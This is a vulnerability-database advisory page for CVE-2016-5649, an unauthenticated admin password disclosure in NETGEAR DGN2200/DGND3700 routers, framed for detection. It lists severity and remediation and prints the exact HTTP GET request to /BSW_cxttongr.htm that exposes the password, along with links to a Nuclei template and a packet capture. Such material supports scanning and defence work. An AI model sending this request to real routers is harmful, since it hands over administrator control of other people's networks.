🔙 목록으로 돌아가기

CVE-2016-5649: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure

TitleNETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
Authorsuman_kar
SeverityCritical
ImpactAn attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
RemediationUpdate the router firmware to the latest version, which includes a fix for the vulnerability.
CVSS Score9.8
EPSS Score0.75112
CVE IDCVE-2016-5649
CWE IDCWE-319,CWE-200
Tags cve2016 cve iot netgear router packetstorm vuln

🔍 Vulnerability Description

NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page ‘BSW_cxttongr.htm’ which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router’s web interface.

🌐 HTTP Request

GET /BSW_cxttongr.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-5649.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-5649.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A